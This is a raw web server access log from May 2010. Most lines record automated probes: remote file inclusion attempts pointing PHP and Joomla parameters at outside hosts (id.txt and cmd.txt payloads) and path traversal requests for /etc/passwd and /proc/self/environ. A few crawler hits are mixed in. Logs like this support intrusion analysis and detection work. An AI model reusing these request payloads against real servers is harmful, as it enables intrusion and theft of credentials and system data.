81.80.122.44 - - [23/May/2010:06:37:27 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:37:28 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
174.133.201.194 - - [23/May/2010:06:38:15 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:06:38:15 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:06:38:16 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 373 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:06:38:48 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:38:55 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:39:04 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
81.80.122.44 - - [23/May/2010:06:40:08 -0500] "GET /logs/access_log.1273017600//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:40:08 -0500] "GET //includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [23/May/2010:06:40:09 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.239.161.143 - - [23/May/2010:06:43:36 -0500] "GET /logs/access_log.1271116800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:06:43:36 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.239.161.143 - - [23/May/2010:06:43:38 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.80.122.44 - - [23/May/2010:06:43:42 -0500] "GET /logs/access_log.1266537600//includes/db_adodb.php?baseDir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
210.219.173.32 - - [23/May/2010:06:45:42 -0500] "GET /logs/access_log.1265587200/bbs/skin/buzzard_espoon/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:06:45:42 -0500] "GET /bbs/skin/buzzard_espoon/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:06:45:42 -0500] "GET /logs/bbs/skin/buzzard_espoon/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
124.217.229.185 - - [23/May/2010:06:47:52 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:47:53 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.105.40.177 - - [23/May/2010:06:48:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""WebRingChecker/1.71 LWP/5.79"
124.217.229.185 - - [23/May/2010:06:48:32 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:48:33 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:48:52 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [23/May/2010:06:48:53 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.241.251.224 - - [23/May/2010:06:53:35 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.241.251.224 - - [23/May/2010:06:53:35 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
210.219.173.32 - - [23/May/2010:06:55:49 -0500] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:06:55:49 -0500] "GET /logs/access_log.1271548800//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
210.219.173.32 - - [23/May/2010:06:55:49 -0500] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
207.46.199.47 - - [23/May/2010:06:57:33 -0500] "GET /logs/access_log.1226880000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.136.121.230 - - [23/May/2010:06:58:53 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:06:58:53 -0500] "GET /logs/access_log.1270771200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:06:58:53 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:06:58:53 -0500] "GET /logs/access_log.1272499200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:07:00:01 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:07:00:01 -0500] "GET /logs/access_log.1270771200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:07:00:01 -0500] "GET /logs/access_log.1272499200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
75.136.121.230 - - [23/May/2010:07:00:01 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.163.148.130 - - [23/May/2010:07:00:09 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.163.148.130 - - [23/May/2010:07:00:09 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.255.23.46 - - [23/May/2010:07:01:13 -0500] "GET /logs////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:01:13 -0500] "GET ////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:01:13 -0500] "GET ////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:01:13 -0500] "GET /logs////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:01:13 -0500] "GET /logs/access_log.1272412800////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:01:13 -0500] "GET /logs/access_log.1272412800////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.129.119.43 - - [23/May/2010:07:04:36 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.55.65.134 - - [23/May/2010:07:07:00 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:07:00 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
188.40.137.140 - - [23/May/2010:07:08:03 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:08:03 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
183.89.129.156 - - [23/May/2010:07:10:59 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.129.156 - - [23/May/2010:07:10:59 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
211.239.161.143 - - [23/May/2010:07:12:15 -0500] "GET //includes/session.php?baseDir=http://klip.interfree.it/id.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
211.239.161.143 - - [23/May/2010:07:12:16 -0500] "GET /logs//includes/session.php?baseDir=http://klip.interfree.it/id.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
207.46.204.240 - - [23/May/2010:07:13:02 -0500] "GET /logs/access_log.1166918400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.255.23.46 - - [23/May/2010:07:14:11 -0500] "GET ////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:14:11 -0500] "GET /logs/access_log.1272412800////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:14:11 -0500] "GET /logs////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:14:40 -0500] "GET /logs/access_log.1272412800////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:14:40 -0500] "GET ////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.255.23.46 - - [23/May/2010:07:14:40 -0500] "GET /logs////index.php?option=com_jeformcr&view=http://reconec.110mb.com/z1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
74.55.65.134 - - [23/May/2010:07:14:51 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:14:51 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
64.251.10.117 - - [23/May/2010:07:14:51 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.834"
64.251.10.117 - - [23/May/2010:07:14:51 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.250.255.243 - - [23/May/2010:07:15:13 -0500] "GET /costume/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
188.40.137.140 - - [23/May/2010:07:16:29 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6654 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:16:29 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
211.115.111.115 - - [23/May/2010:07:16:44 -0500] "GET /logs/access_log.1272412800//skin/board/default/doctype.php?dir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:07:16:44 -0500] "GET /logs/access_log.1271462400//skin/board/default/doctype.php?dir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:07:16:44 -0500] "GET /logs//skin/board/default/doctype.php?dir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.111.115 - - [23/May/2010:07:16:47 -0500] "GET //skin/board/default/doctype.php?dir=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:17:29 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:17:29 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:17:29 -0500] "GET /logs/access_log.1271116800//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:18:30 -0500] "GET //skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:18:30 -0500] "GET /logs//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:18:30 -0500] "GET /logs/access_log.1271116800//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.180.42.218 - - [23/May/2010:07:18:39 -0500] "GET /logs/access_log.1263081600//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
120.50.47.172 - - [23/May/2010:07:18:46 -0500] "GET /logs/index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:46 -0500] "GET /index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:47 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:47 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:47 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:47 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:48 -0500] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:18:48 -0500] "GET /errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
58.180.42.218 - - [23/May/2010:07:19:54 -0500] "GET /logs/access_log.1263081600//skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:14 -0500] "GET /logs/MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 315 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:14 -0500] "GET /logs/access_log.1272326400/MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:15 -0500] "GET /MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:15 -0500] "GET /logs/access_log.1272326400/MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:16 -0500] "GET /logs/MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 315 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:16 -0500] "GET /MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 310 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:39 -0500] "GET /logs/access_log.1262649600/MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:21:43 -0500] "GET /logs/access_log.1262649600/MOD_forum_fields_parse.php?phpbb_root_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 337 "-""Mozilla/5.0"
183.89.129.156 - - [23/May/2010:07:21:55 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
183.89.129.156 - - [23/May/2010:07:21:56 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)"
120.50.47.172 - - [23/May/2010:07:23:52 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:23:52 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:23:53 -0500] "GET /logs/access_log.1273622400/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
120.50.47.172 - - [23/May/2010:07:23:54 -0500] "GET /logs/access_log.1273622400/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
88.191.94.188 - - [23/May/2010:07:24:25 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:07:24:25 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:07:24:25 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:07:24:41 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
